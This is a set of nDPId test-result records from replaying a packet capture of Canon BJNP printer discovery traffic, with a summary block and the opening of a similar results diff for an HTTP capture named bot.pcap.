00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3}
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1467725383705,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725383705,"pkt":"RQAALAmRAAB5EfxQwKi5jcCoAQHDqSGkABg0T0JKTlACAQAAF6YAAAAAAACF3A=="}
00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3}
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1467725383909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725383909,"pkt":"RQAALAmSAAB5EfxOwKi5jcCoAQLDqSGkABg0TUJKTlACAQAAF6cAAAAAAAAfDQ=="}
00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3}
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1467725384113,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384113,"pkt":"RQAALAmTAAB5EfxMwKi5jcCoAQPDqSGkABg0S0JKTlACAQAAF6gAAAAAAACCRA=="}
00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3}
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1467725384313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384313,"pkt":"RQAALAmVAAB5EfxJwKi5jcCoAQTDqSGkABg0SUJKTlACAQAAF6kAAAAAAADs+w=="}
00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3}
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1467725384517,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384517,"pkt":"RQAALAmWAAB5EfxHwKi5jcCoAQXDqSGkABg0R0JKTlACAQAAF6oAAAAAAADhdg=="}
00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3}
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1467725384721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384721,"pkt":"RQAALAmXAAB5EfxFwKi5jcCoAQbDqSGkABg0RUJKTlACAQAAF6sAAAAAAACzRQ=="}
00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3}
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1467725384921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384921,"pkt":"RQAALAmYAAB5EfxDwKi5jcCoAQfDqSGkABg0Q0JKTlACAQAAF6wAAAAAAAC5aQ=="}
00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3}
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1467725385125,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725385125,"pkt":"RQAALAmaAAB5EfxAwKi5jcCoAQjDqSGkABg0QUJKTlACAQAAF60AAAAAAACvDw=="}
00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3}
00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1467725385329,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725385329,"pkt":"RQAALAmbAAB5Efw+wKi5jcCoAQnDqSGkABg0P0JKTlACAQAAF64AAAAAAABjbw=="}
00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}}
00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":160,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1467725385329}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 10/0
~~ packets captured/processed: 10/10
~~ skipped flows.............: 0
~~ total layer4 data length..: 0 bytes
~~ total detected protocols..: 0
~~ total active/idle flows...: 0/0
~~ total layer4 data length..: 160 bytes
~~ total detected protocols..: 10
~~ total active/idle flows...: 10/10
~~ total timeout flows.......: 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ total memory allocated....: 5099937 bytes
~~ total memory freed........: 5099937 bytes
~~ total allocations/frees...: 113310/113310
~~ total memory allocated....: 5108947 bytes
~~ total memory freed........: 5108947 bytes
~~ total allocations/frees...: 113350/113350
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 175 chars
~~ json string max len.......: 551 chars
~~ json string avg len.......: 361 chars
~~ json string min len.......: 440 chars
~~ json string max len.......: 682 chars
~~ json string avg len.......: 560 chars

12
test/results/bot.pcap.out
View File

@@ -1,11 +1,11 @@
00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bot.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1645108240233}
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645108240233,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1645108240233,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQIAMBFSQABuBooHKE2nJFkfSNz9AABQtwbJ7AAAAABwwvrwl9EAAAIEBaABAQQC"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AAAMB6wytJaRl+L8gQAATQgARQAAMAAAQAA\/BspbWR9I3ChNpyQAUP0AWPWTl7cGye1wEnIQNMAAAAIEBbQBAQQC"}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645108240339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":1645108240339,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQAAKBFTQABuBooQKE2nJFkfSNz9AABQtwbJ7Vj1k5hQEPrw2KMAAKqq+vDYow=="}
